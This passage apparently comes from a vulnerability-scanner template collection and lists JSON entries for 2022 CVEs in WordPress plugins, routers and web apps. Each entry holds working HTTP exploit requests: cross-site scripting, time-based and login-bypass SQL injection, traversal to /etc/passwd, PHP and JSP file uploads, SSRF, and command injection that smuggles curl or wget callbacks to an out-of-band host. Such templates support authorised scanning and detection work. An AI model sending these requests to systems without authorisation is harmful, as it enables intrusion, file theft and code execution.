\"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30525","info":{"name":"Zyxel Firewall - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /ztp/cgi-bin/handler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35653","info":{"name":"Moodle LTI module Reflected - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /mod/lti/auth.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nxxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src='x'onerror=alert('document_domain')>","moodle-editor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0432","info":{"name":"Mastodon Prototype Pollution Vulnerability","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/embed.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["if (data.type !== 'setHeight' || !iframes[data.id]) {"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-27043","info":{"name":"Yearning - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd","{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27926","info":{"name":"Zimbra Collaboration (ZCS) - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>Title???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-3142","info":{"name":"NEX-Forms Plugin < 7.9.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 30s\nGET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_2 == 200","contains(body_2, \"NEX-Forms\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(/document.domain/)</script>\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 